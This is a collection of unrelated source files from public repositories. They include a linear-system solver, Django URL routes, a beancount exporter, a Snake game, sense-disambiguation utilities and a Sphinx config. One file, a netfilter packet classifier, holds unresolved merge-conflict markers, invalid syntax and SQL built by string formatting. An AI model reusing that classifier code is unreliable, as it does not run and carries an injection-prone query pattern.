2b839ebabd98bcd1a390bd0a54812a9f5ccb336c | 3e6eecee5db3eedf395111a2abfe96bc3593fccd | /main.py | 965d940990f142146dfcb4e4ca3cdf8a398b7628 | [] | no_license | cassiostp/gauss_jacobi_seidel | 07c1d84f0f4e77ec6bc793a85e20944b76cb416c | 433277d47d81374e89a94884c0625cb58a339cbd | refs/heads/master | 2021-01-17T17:44:50.210833 | 2016-07-10T23:36:40 | 2016-07-10T23:36:40 | 63,022,246 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 824 | py | import gauss_jacobi_seidel as gj
import matriz_inversa as mi
print("valor de n:")
n = int(input().strip())
A = []
b = []
for i in range(n):
print("digite os elementos da linha", i+1, "da matriz A separados por espaço")
A.append([int(i) for i in input().strip().split()])
print("digite os elementos de b separados por espaço")
b += [int(i) for i in input().strip().split()]
print("digite o valor da precisão")
e = float(input().strip())
inv = mi.inversa(A)
d = []
soma = 0
print("\n\n Matriz Inversa")
for i in range(len(inv)):
print(inv[i])
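# Multiply the inverse by b by hand: d[i] = sum_j inv[i][j] * b[j], i.e. the direct
# solution of A x = b, which can be compared with the iterative results printed below.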
for i in range(len(inv[0])):
for j in range(len(inv)):
soma += inv[i][j] * b[j]
d.append(soma)
soma = 0
print("\nd = A^(-1) * b => d =", d)
print("\nGauss-Jacobi", gj.gauss_jacobi(A, b, n, e))
print("\nGauss-Seidel", gj.gauss_seidel(A, b, n, e))
| [
"[email protected]"
] | |
858f100f30a77b9896b990ff08eca4a6d9244282 | f3cc5ee09c357fa9731dd4e3e4d575dfce02d97c | /sandboxsite/restapp/urls.py | 37153599f2606e83db9dfe7dd0bab930e04ae639 | [] | no_license | luafran/django_sandbox | 458c2d520417e07a849da6b2988dd0521a208cc6 | b114adb11ad402bfcfcb6d4bec204b456b6bac20 | refs/heads/master | 2020-05-15T16:50:59.451052 | 2013-10-02T22:26:58 | 2013-10-02T22:26:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,025 | py | from django.conf.urls import patterns, url
from django.conf.urls import include
from rest_framework.urlpatterns import format_suffix_patterns
from restapp import views
urlpatterns = patterns('',
url(r'^$', views.api_root),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),
url(r'^users/?$', views.UserList.as_view(), name='user-list'),
url(r'^users/(?P<pk>[0-9]+)/?$', views.UserDetail.as_view(), name='user-detail'),
url(r'^stores/?$', views.StoreList.as_view(), name='store-list'),
url(r'^stores/(?P<pk>[0-9a-fA-F]+)/?$', views.StoreDetail.as_view(), name='store-detail'),
url(r'^products/?$', views.ProductList.as_view(), name='product-list'),
url(r'^products/(?P<pk>[0-9]+)/?$', views.ProductDetail.as_view(), name='product-detail'),
url(r'^checkins/?$', views.CheckinList.as_view(), name='checkin-list'),
url(r'^checkins/(?P<pk>[0-9]+)/?$', views.CheckinDetail.as_view(), name='checkin-detail'),
)
urlpatterns = format_suffix_patterns(urlpatterns)
| [
"[email protected]"
] | |
2f79fe00c71069bbe2135128f1342bdedca5b0c0 | ff76c7227c0fc0f0c691bc0592d6d5f67afd2d5e | /Classifier.py | 5a127b22d41b6402c02216dd4d6b799407b1b1cd | [] | no_license | HaTiMuX/SFC-Routing | 5bbd97aadc81b6983ddaef995f87502602a83067 | 6cb5157f72aad530b2b5b18dd3ea1b0d443f41d1 | refs/heads/master | 2016-09-06T01:17:31.449316 | 2014-07-02T09:05:40 | 2014-07-02T09:05:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,494 | py | #@Author=HaTiM#
#@Title=Classifier#
#@Function=MARK PACKETS DEPENDING ON SPECIFIC RULES#
import nfqueue, socket
from scapy.all import *
import os
<<<<<<< HEAD
os.system('iptables -A PREROUTING -j NFQUEUE --queue-num 0')
def conversion(N):
b = []
div = [10000, 1000, 100, 10, 1]
i=0
for d in div:
if N/d==1:
b[i]=1
else:
b[i]=1
i+=1
return b
=======
os.system('iptables -A OUTPUT -j NFQUEUE --queue-num 0')
>>>>>>> 85dd5e78a042515bef00c2b20e8f220e18e52afb
def cb(payload):
data = payload.get_data()
p = IP(data)
<<<<<<< HEAD
proto = p[IP].proto
src = p[IP].src
dst = p[IP].dst
try:
sql = "SELECT * FROM ClassRules WHERE ParNum<=3"
cursor.execute(sql)
results = cursor.fetchall()
for result in results:
if result[]==5:
if src==result[2] and dst==result[3] and proto==result[4] and sport==result[5] and dport==result[6]:
p.tos= result[1]
break
if result[]==4:
if src==result[2] and dst==result[3] and proto==result[4] and sport==result[5] and dport==result[6]:
p.tos= result[1]
break
if result[7]>3:
if src==result[1] and dst==result[2] and proto==result[2]:
p.tos= result[0]
break
elif result[]==2:
if((src==result[1] and dst==result[2]) or (src==result[1] and proto==result[3]) or (dst==result[2] and proto==result[3])):
p.tos= result[0]
break
elif result[]==1:
if(src==result[1] or dst==result[2] or proto==result[3]):
p.tos= result[0]
break
del p[IP].chksum
payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(p), len(p))
print "Matching rule: "
except:
print "Error reading rules"
elif (TCP in IP) or (UDP in IP):
dport = p[1].dport
sport = p[1].sport
try:
sql = "SELECT * FROM ClassRules"
cursor.execute(sql)
results = cursor.fetchall()
cond1 = (src==result[1] and dst==result[2] and proto==result[3] and sport==result[4]) or
cond2 = (src==result[1] and dst==result[2] and proto==result[3] and dport==result[5])
for result in results:
if result[]==5:
elif result[]==4:
if((src==result[1] and dst==result[2]) or (src==result[1] and proto==result[3]) or (dst==result[2] and proto==result[3])):
p.tos= result[0]
break
elif result[]==1:
if(src==result[1] or dst==result[2] or proto==result[3]):
p.tos= result[0]
break
=======
src = p[IP].src
try:
port = p[1].dport
try:
sql = "SELECT SF_MAP_INDEX FROM Rules WHERE IP='%s' and port='%d'" % (src, port)
cursor.execute(sql)
result = cursor.fetchone()
if result is not None:
p.tos = result[0]
del p[IP].chksum
payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(p), len(p))
else:
try:
sql = "SELECT SF_MAP_INDEX FROM Rules WHERE IP is NULL and port='%d'" % (port)
cursor.execute(sql)
result = cursor.fetchone()
if result is not None:
p.tos = result[0]
del p[IP].chksum
payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(p), len(p))
else:
try:
sql = "SELECT SF_MAP_INDEX FROM Rules WHERE IP='%s' and port is NULL" % (src)
cursor.execute(sql)
result = cursor.fetchone()
if result is not None:
p.tos = result[0]
del p[IP].chksum
payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(p), len(p))
else:
print("Packet Accepted: logical routing")
payload.set_verdict(nfqueue.NF_ACCEPT)
except:
print "Error looking for mark (by IP)"
except:
print "Error looking for mark (by port)"
except:
print "Error looking for mark (by IP and port)"
except:
print "Protocol does not support destination port field"
sql = "SELECT SF_MAP_INDEX FROM Rules WHERE IP='%s' and port is NULL" % (src)
try:
cursor.execute(sql)
result = cursor.fetchone()
if result is not None:
p.tos = result[0]
del p[IP].chksum
payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(p), len(p))
else:
print("Packet Accepted: logical routing")
payload.set_verdict(nfqueue.NF_ACCEPT)
except:
print "Error looking for mark (by IP)"
>>>>>>> 85dd5e78a042515bef00c2b20e8f220e18e52afb
q = nfqueue.queue()
q.open()
q.unbind(socket.AF_INET)
q.bind(socket.AF_INET)
q.set_callback(cb)
q.create_queue(0) #Same queue number of the rule
#q.set_queue_maxlen(50000)
try:
q.try_run()
except KeyboardInterrupt, e:
os.system('iptables -F')
print "interruption"
q.unbind(socket.AF_INET)
q.close()
| [
"[email protected]"
] | |
6c6f33f15b63b5e19d285baad83f87e0e8d5507d | eda4a1f746555c9cefa7020f94cd6cc2e73a5588 | /beancount2gnucash.py | c4b738ae4438024152a3fa948ec29188f4c8f64c | [
"MIT"
] | permissive | juniorkrvl/beancount2gnucash | f03d6ff4f5ee1b5f37fd8f7da1d80b6b8423ae86 | 3e647e3e53429fd1e95a750601dbac1534d1dac2 | refs/heads/master | 2023-03-15T09:39:40.007648 | 2018-12-23T23:15:39 | 2018-12-23T23:15:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,127 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import os.path
import csv
from collections import defaultdict, OrderedDict
from difflib import get_close_matches
from beancount import loader, core
LEDGER_FILENAME = "ledger_filename"
GNUCASH_ACC_TYPES = {"BANK", "CASH", "ASSET",
"CREDIT", "LIABILITY", "STOCK", "MUTUAL",
"INCOME", "EXPENSE", "EQUITY",
"RECEIVABLE", "PAYABLE", "TRADING"}
ACC_HEADERS = OrderedDict(
[("type", "type"), ("full_name", "full_name"), ("name", "name"), ("code", "code"),
("description", "description"), ("color", "color"), ("notes", "notes"),
("commoditym", "commoditym"), ("commodityn", "commodityn"),
("hidden", "hidden"), ("tax", "tax"), ("place_holder", "place_holder")])
def main(ledger_filename):
head, tail = os.path.split(ledger_filename)
basename = os.path.splitext(tail)[0]
entries, errors, options = loader.load_file(ledger_filename)
export_accounts([entry for entry in entries if isinstance(
entry, core.data.Open)], head, basename)
def export_accounts(accounts, directory, basename):
def create_row(full_name, name, type, commoditym, place_holder):
row = defaultdict(lambda: "")
row[ACC_HEADERS["full_name"]] = full_name
row[ACC_HEADERS["name"]] = name
row[ACC_HEADERS["type"]] = type
row[ACC_HEADERS["commoditym"]] = commoditym
row[ACC_HEADERS["commodityn"]] = "CURRENCY"
row[ACC_HEADERS["hidden"]] = "F"
row[ACC_HEADERS["tax"]] = "F"
row[ACC_HEADERS["place_holder"]] = place_holder
return row
rows = []
for account in accounts:
currency = account.currencies[0]
parent = account.account.split(":")
while len(parent) > 0:
full_name = ":".join(parent)
if any([full_name == row[ACC_HEADERS["full_name"]] for row in rows]):
break
matched_type = get_close_matches(
parent[0].upper(), GNUCASH_ACC_TYPES, n=1)[0]
row = create_row(full_name, parent[-1], matched_type, currency,
"T" if len(parent) == 1 else "F")
rows.append(row)
parent = parent[:-1]
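    # Sort parents before children (fewer ':' separators first); the GnuCash CSV
    # account importer is assumed to need a parent account to appear before its children.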
rows.sort(key=lambda row: row[ACC_HEADERS["full_name"]].count(":"))
out_filename = basename + '_accounts.csv'
with open(out_filename, 'w', newline='') as csvfile:
writer = csv.DictWriter(
csvfile, ACC_HEADERS.values(), quoting=csv.QUOTE_ALL)
writer.writeheader()
for row in rows:
writer.writerow(row)
print("Written to " + out_filename)
def parse_args():
def filename(x):
x = str(x)
if not os.path.isfile(x):
raise argparse.ArgumentTypeError("Given filename is not a file")
return x
parser = argparse.ArgumentParser()
parser.add_argument(LEDGER_FILENAME, type=filename,
help="filename of beancount ledger file")
return parser.parse_args()
if __name__ == "__main__":
args = parse_args()
main(args.ledger_filename)
| [
"[email protected]"
] | |
528e65d3ed31b3633bd16eca31c0589448258003 | 1a39f63f7eb10ade06babcc42277ed5c6920d6d9 | /main.py | 5ad459c28a5df223af183ec09b8646ff957de84b | [
"MIT"
] | permissive | TanishqSinghAnand/Snake-Game | 8e8c9661c7e882ec2aafaa9c60cee9a18ca0ac8a | 7443ef88d033035225f0680828b5cacbf565d976 | refs/heads/master | 2023-01-22T22:48:22.107623 | 2020-11-19T05:08:49 | 2020-11-19T05:08:49 | 314,266,009 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,429 | py | import random
import pygame
import sys
from pygame.locals import *
FPS = 15
WINDOWWIDTH = 640
WINDOWHEIGHT = 480
CELLSIZE = 20
assert WINDOWWIDTH % CELLSIZE == 0, "Window width must be a multiple of cell size."
assert WINDOWHEIGHT % CELLSIZE == 0, "Window height must be a multiple of cell size."
CELLWIDTH = int(WINDOWWIDTH / CELLSIZE)
CELLHEIGHT = int(WINDOWHEIGHT / CELLSIZE)
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
DARKGREEN = (0, 155, 0)
DARKGRAY = (40, 40, 40)
BGCOLOR = BLACK
UP = 'up'
DOWN = 'down'
LEFT = 'left'
RIGHT = 'right'
HEAD = 0 # syntactic sugar: index of the worm's head
def main():
global FPSCLOCK, DISPLAYSURF, BASICFONT
pygame.init()
FPSCLOCK = pygame.time.Clock()
DISPLAYSURF = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT))
BASICFONT = pygame.font.Font('freesansbold.ttf', 18)
pygame.display.set_caption('Snake Game')
showStartScreen()
while True:
runGame()
showGameOverScreen()
def runGame():
# Set a random start point.
startx = random.randint(5, CELLWIDTH - 6)
starty = random.randint(5, CELLHEIGHT - 6)
wormCoords = [{'x': startx, 'y': starty},
{'x': startx - 1, 'y': starty},
{'x': startx - 2, 'y': starty}]
direction = RIGHT
# Start the apple in a random place.
apple = getRandomLocation()
while True:
for event in pygame.event.get(): # event handling loop
if event.type == QUIT:
terminate()
elif event.type == KEYDOWN:
if (event.key == K_LEFT or event.key == K_a) and direction != RIGHT:
direction = LEFT
elif (event.key == K_RIGHT or event.key == K_d) and direction != LEFT:
direction = RIGHT
elif (event.key == K_UP or event.key == K_w) and direction != DOWN:
direction = UP
elif (event.key == K_DOWN or event.key == K_s) and direction != UP:
direction = DOWN
elif event.key == K_ESCAPE:
terminate()
# check if the worm has hit itself or the edge
if wormCoords[HEAD]['x'] == -1 or wormCoords[HEAD]['x'] == CELLWIDTH or wormCoords[HEAD]['y'] == -1 or wormCoords[HEAD]['y'] == CELLHEIGHT:
return # game over
for wormBody in wormCoords[1:]:
if wormBody['x'] == wormCoords[HEAD]['x'] and wormBody['y'] == wormCoords[HEAD]['y']:
return # game over
        # check if worm has eaten an apple
if wormCoords[HEAD]['x'] == apple['x'] and wormCoords[HEAD]['y'] == apple['y']:
# don't remove worm's tail segment
apple = getRandomLocation() # set a new apple somewhere
else:
del wormCoords[-1] # remove worm's tail segment
# move the worm by adding a segment in the direction it is moving
if direction == UP:
newHead = {'x': wormCoords[HEAD]['x'],
'y': wormCoords[HEAD]['y'] - 1}
elif direction == DOWN:
newHead = {'x': wormCoords[HEAD]['x'],
'y': wormCoords[HEAD]['y'] + 1}
elif direction == LEFT:
newHead = {'x': wormCoords[HEAD]
['x'] - 1, 'y': wormCoords[HEAD]['y']}
elif direction == RIGHT:
newHead = {'x': wormCoords[HEAD]
['x'] + 1, 'y': wormCoords[HEAD]['y']}
wormCoords.insert(0, newHead)
DISPLAYSURF.fill(BGCOLOR)
drawGrid()
drawWorm(wormCoords)
drawApple(apple)
drawScore(len(wormCoords) - 3)
pygame.display.update()
FPSCLOCK.tick(FPS)
def drawPressKeyMsg():
pressKeySurf = BASICFONT.render('Press a key to play.', True, DARKGRAY)
pressKeyRect = pressKeySurf.get_rect()
pressKeyRect.topleft = (WINDOWWIDTH - 200, WINDOWHEIGHT - 30)
DISPLAYSURF.blit(pressKeySurf, pressKeyRect)
def checkForKeyPress():
if len(pygame.event.get(QUIT)) > 0:
terminate()
keyUpEvents = pygame.event.get(KEYUP)
if len(keyUpEvents) == 0:
return None
if keyUpEvents[0].key == K_ESCAPE:
terminate()
return keyUpEvents[0].key
def showStartScreen():
titleFont = pygame.font.Font('freesansbold.ttf', 100)
titleSurf1 = titleFont.render('Snake Game!', True, WHITE, DARKGREEN)
titleSurf2 = titleFont.render('Snake Game!', True, GREEN)
degrees1 = 0
degrees2 = 0
while True:
DISPLAYSURF.fill(BGCOLOR)
rotatedSurf1 = pygame.transform.rotate(titleSurf1, degrees1)
rotatedRect1 = rotatedSurf1.get_rect()
rotatedRect1.center = (WINDOWWIDTH / 2, WINDOWHEIGHT / 2)
DISPLAYSURF.blit(rotatedSurf1, rotatedRect1)
rotatedSurf2 = pygame.transform.rotate(titleSurf2, degrees2)
rotatedRect2 = rotatedSurf2.get_rect()
rotatedRect2.center = (WINDOWWIDTH / 2, WINDOWHEIGHT / 2)
DISPLAYSURF.blit(rotatedSurf2, rotatedRect2)
drawPressKeyMsg()
if checkForKeyPress():
pygame.event.get() # clear event queue
return
pygame.display.update()
FPSCLOCK.tick(FPS)
degrees1 += 3 # rotate by 3 degrees each frame
degrees2 += 7 # rotate by 7 degrees each frame
def terminate():
pygame.quit()
sys.exit()
def getRandomLocation():
return {'x': random.randint(0, CELLWIDTH - 1), 'y': random.randint(0, CELLHEIGHT - 1)}
def showGameOverScreen():
gameOverFont = pygame.font.Font('freesansbold.ttf', 150)
gameSurf = gameOverFont.render('Game', True, WHITE)
overSurf = gameOverFont.render('Over', True, WHITE)
gameRect = gameSurf.get_rect()
overRect = overSurf.get_rect()
gameRect.midtop = (WINDOWWIDTH / 2, 10)
overRect.midtop = (WINDOWWIDTH / 2, gameRect.height + 10 + 25)
DISPLAYSURF.blit(gameSurf, gameRect)
DISPLAYSURF.blit(overSurf, overRect)
drawPressKeyMsg()
pygame.display.update()
pygame.time.wait(500)
checkForKeyPress() # clear out any key presses in the event queue
while True:
if checkForKeyPress():
pygame.event.get() # clear event queue
return
def drawScore(score):
scoreSurf = BASICFONT.render('Score: %s' % (score), True, WHITE)
scoreRect = scoreSurf.get_rect()
scoreRect.topleft = (WINDOWWIDTH - 120, 10)
DISPLAYSURF.blit(scoreSurf, scoreRect)
def drawWorm(wormCoords):
for coord in wormCoords:
x = coord['x'] * CELLSIZE
y = coord['y'] * CELLSIZE
wormSegmentRect = pygame.Rect(x, y, CELLSIZE, CELLSIZE)
pygame.draw.rect(DISPLAYSURF, DARKGREEN, wormSegmentRect)
wormInnerSegmentRect = pygame.Rect(
x + 4, y + 4, CELLSIZE - 8, CELLSIZE - 8)
pygame.draw.rect(DISPLAYSURF, GREEN, wormInnerSegmentRect)
def drawApple(coord):
x = coord['x'] * CELLSIZE
y = coord['y'] * CELLSIZE
appleRect = pygame.Rect(x, y, CELLSIZE, CELLSIZE)
pygame.draw.rect(DISPLAYSURF, RED, appleRect)
def drawGrid():
for x in range(0, WINDOWWIDTH, CELLSIZE): # draw vertical lines
pygame.draw.line(DISPLAYSURF, DARKGRAY, (x, 0), (x, WINDOWHEIGHT))
for y in range(0, WINDOWHEIGHT, CELLSIZE): # draw horizontal lines
pygame.draw.line(DISPLAYSURF, DARKGRAY, (0, y), (WINDOWWIDTH, y))
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
2e25806580836631d6e2798b5384d8666c21ee62 | 5806179a278376dc3e74e9f325e32ab822549388 | /anlysisHtml.py | 364b4dfbee42b3d54a4c6afcb5e3b2d41d5b4486 | [] | no_license | wobuaixiatian/python | 6d3253354c1e70759268a4e91f131dfc270ea7cd | 99d70bc2a2a456e185f2f5b1f712db69221efcba | refs/heads/master | 2021-08-28T04:44:41.636349 | 2017-12-11T07:33:19 | 2017-12-11T07:33:19 | 110,091,373 | 0 | 0 | null | 2017-11-09T09:05:02 | 2017-11-09T09:01:32 | null | UTF-8 | Python | false | false | 560 | py | #!/usr/bin/env python3
#coding=utf-8
from html.parser import HTMLParser
class HeadingParser(HTMLParser):
inHeading = False
def handle_starttag(self, tag, attrs):
if tag=="h1":
self.inHeading=True
print(attrs)
print(len(attrs))
print(attrs[0])
print(attrs[0][0])
print("Found a Heading 1")
def handle_data(self, data):
if self.inHeading:
print(data)
def handle_endtag(self, tag):
if tag=="h1":
self.inHeading = False
hParser = HeadingParser()
file = open("html.html","r")
html = file.read()
file.close()
hParser.feed(html)
| [
"[email protected]"
] | |
32b159d3e89f55e8eccccecfaf31297f24ad7ebc | 2d9fe8fb852c1db37d4408e5ee4fe1b5baa5b3ba | /question7.py | 461623baea8f4c9fbe702e729b34d90d7359dde4 | [] | no_license | tUNg131/Problem-sets | 6a1348612f53f85caa56fc3992e82701dbf84013 | 9bc917dd74bff82eb1ddd2d46a9b6748560f77e0 | refs/heads/master | 2020-12-02T13:56:06.188396 | 2020-01-02T05:44:32 | 2020-01-02T05:44:32 | 231,029,280 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 203 | py | import pdb
items =[int(x) for x in input().split(',')]
rowNum = items[0]
colNum = items[1]
values = [None] * rowNum
for i in range(rowNum):
values[i] = [j*i for j in range(colNum)]
print(values)
| [
"[email protected]"
] | |
6c4f6816a6de12a44d590d811c46cefc4ea60004 | c1ad3ee7e6445f59bc010c044ca08668b157fc8e | /Logic/Logic.py | 7b70b3edf977b96fac36d6509c932e41806dd0fc | [] | no_license | MennaAly/StockMarket | 2bbc79cc7e085ca5c808d5c5f7b3a3b3530f03a3 | 5372ca30bbc280da1d3539112171ce9b069ea736 | refs/heads/master | 2020-03-24T14:07:56.892422 | 2018-07-29T21:45:17 | 2018-07-29T21:45:17 | 142,760,112 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 372 | py |
class logic():
    def collectColoumnData(self,data):
        # join a list of string values into a single comma-separated string
        coloumn = ''
        for idx,element in enumerate(data):
            if idx != len(data)-1:
                coloumn = coloumn + element + ','
            else:
                coloumn = coloumn + element
        return coloumn
    def seperateColumnData(self,coloumn):
        # split a comma-separated string back into a list of values
        return coloumn.split(',')
| [
"[email protected]"
] | |
aaaf565ad47e8103eb9e97641bdf8ffd51d95875 | d1da57ac542041d33a5b9e422d80ae5266b5c21f | /utils.py | 1b8fab5ba1147a0c13037d24a6e36ac113cb92fa | [] | no_license | GiBg1aN/TVVSD | 17937c9c7a38e751c38299ec2e5f9af8b406a847 | 4c43b10456dba55fc35690bff486f87cc857df14 | refs/heads/master | 2023-01-05T00:20:47.705989 | 2020-11-08T09:21:51 | 2020-11-08T09:21:51 | 177,809,913 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,645 | py | import numpy as np
import pandas as pd
def filter_senses(senses: pd.DataFrame, sense_labels: pd.DataFrame) -> pd.DataFrame:
"""
Remove senses that are not used in dataset images.
Args:
senses: A dataframe of verb senses
sense_labels: A dataframe containing the correct sense for each
pair (image, verb).
Returns:
A dataset containing only the senses in 'sense_labels'
"""
new_senses = pd.DataFrame(columns=['lemma', 'sense_num', 'definition',
'ontonotes_sense_examples', 'visualness_label'])
for _, row in enumerate(senses.itertuples()):
sense = getattr(row, 'lemma')
sense_id = getattr(row, 'sense_num')
occurrences = sense_labels.query("lemma == @sense and sense_chosen == @sense_id")
if occurrences.shape[0] > 0:
new_senses = new_senses.append([row], sort=False)
new_senses = new_senses.drop(columns=['Index'])
new_senses.reset_index(inplace=True, drop=True)
return new_senses
def filter_image_name(img_name: str) -> str:
"""
    Normalise COCO image names.
    In COCO image annotations, labels carry a zero-padded numeric identifier that is
    incompatible with other image name sources. The purpose of this function is
    to strip that zero-padding (and the file extension) from such names.
Args:
img_name: image name in the form PREFIX_XXXX.jpeg
Returns:
        The image name with the zero-padding and file extension stripped
Raises:
        ValueError: when the numeric part of the image name cannot be parsed
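    Example:
        A sketch of the expected behaviour (the file name below is made up and
        assumes a 4-character '.jpg' extension):
        >>> filter_image_name('COCO_train2014_000000123456.jpg')
        'COCO_train2014_123456'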
"""
train_prefix = 'COCO_train2014_'
val_prefix = 'COCO_val2014_'
if img_name.startswith(train_prefix):
stripped_zeros = train_prefix + str(int(img_name[len(train_prefix):-4]))
elif img_name.startswith(val_prefix):
stripped_zeros = val_prefix + str(int(img_name[len(val_prefix):-4]))
else:
stripped_zeros = img_name
return stripped_zeros.split('.')[0]
def combine_data(embeddings: pd.DataFrame, images_features: pd.DataFrame) -> pd.DataFrame:
"""
Concatenate the 300-dim word-embeddings-vector and the 4096-dim
VGG16 feature vector and unit-normalise the output vector.
Args:
embeddings: embedding vector
images_features: visual feature-vector
Returns:
A dataframe containing the columns:
'e_caption', 'e_object', 'e_combined', 'e_image',
'concat_image_caption', 'concat_image_object', 'concat_image_text'.
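    Example:
        A minimal sketch (the index label and vector contents are made up; only
        the column names come from this module):
        >>> emb = pd.DataFrame({'e_caption': [np.ones(300)], 'e_object': [np.ones(300)],
        ...                     'e_combined': [np.ones(300)]}, index=['img1'])
        >>> vis = pd.DataFrame({'e_image': [np.ones(4096)]}, index=['img1'])
        >>> combined = combine_data(emb, vis)
        >>> # combined['concat_image_text'] now holds unit-normalised 4396-dim vectors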
"""
full_dataframe = pd.concat([embeddings, images_features], axis=1, sort=True)
full_dataframe['concat_image_caption'] = full_dataframe.apply(
lambda r: np.concatenate([r.e_caption, r.e_image.ravel()]), axis=1)
full_dataframe['concat_image_object'] = full_dataframe.apply(
lambda r: np.concatenate([r.e_object, r.e_image.ravel()]), axis=1)
full_dataframe['concat_image_text'] = full_dataframe.apply(
lambda r: np.concatenate([r.e_combined, r.e_image.ravel()]), axis=1)
return full_dataframe.applymap(lambda x: x / np.linalg.norm(x, ord=2))
def aggregate_stats(experiments_path):
columns = ['labels_per_class', 'alpha', 'verb_type', 'representation_type', 'accuracy']
experiments = pd.read_csv(experiments_path, names=columns)[['labels_per_class', 'representation_type', 'verb_type', 'accuracy']]
aggregated_data = experiments.groupby(['labels_per_class', 'representation_type', 'verb_type'], as_index=False).agg({'accuracy': ['mean', lambda x: x.std(ddof=0)]})
aggregated_data.columns = ['labels_per_class', 'representation_type', 'verb_type', 'mean', 'std']
aggregated_data.to_html('results.html')
print('Aggregated results written to an HTML file.')
| [
"[email protected]"
] | |
03e5eae2cb9acad5815aa5fbf6229dcc8d178b22 | c33fd38d2c79ca740b0bcde934034168a37698aa | /myenv/bin/gunicorn | 95c1f3bdbc438aa3fd5fd24b7744132c8568e1c9 | [] | no_license | kxnaylorCLE216/resumeSite | 7531da230b35e7abb057f53cb44d747e22c4c81a | 7aaa2aa59ae1fc4b8faf7c56c904c65b9fdf9b6e | refs/heads/master | 2022-10-06T04:47:28.667125 | 2019-06-28T02:59:02 | 2019-06-28T02:59:02 | 193,295,961 | 1 | 0 | null | 2022-09-23T22:26:15 | 2019-06-23T01:56:11 | Python | UTF-8 | Python | false | false | 248 | #!/home/kxn/Repos/resumeSite/myenv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from gunicorn.app.wsgiapp import run
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(run())
| [
"[email protected]"
] | ||
ea4b5219ef13b73d5f4b75e5b228f31c963c9b3d | 4d9cc4aa35cf950f7cf2a90b8feae293901bb560 | /docsite/source/conf.py | c65216b602969da9c566722a48fb88a88a4a3a46 | [
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | wgd3/dcaf | 0dc445daf04832f43d4a895314508f46750be821 | 24d95d74072d0946cba499e671e3440a7bb4e574 | refs/heads/master | 2021-01-12T11:46:25.511293 | 2016-04-08T17:42:33 | 2016-04-08T17:42:33 | 54,895,839 | 0 | 0 | null | 2016-03-28T13:56:03 | 2016-03-28T13:56:03 | null | UTF-8 | Python | false | false | 9,376 | py | # -*- coding: utf-8 -*-
#
# CSC DCAF documentation build configuration file, created by
# sphinx-quickstart on Thu Mar 3 14:19:20 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import sphinx_rtd_theme
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.todo',
'sphinx.ext.coverage',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'CSC DCAF'
copyright = u'2016, CSC'
author = u'Extreme Automation'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'1.2'
# The full version, including alpha/beta/rc tags.
release = u'1.2'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (relative to this directory) to use as a favicon of
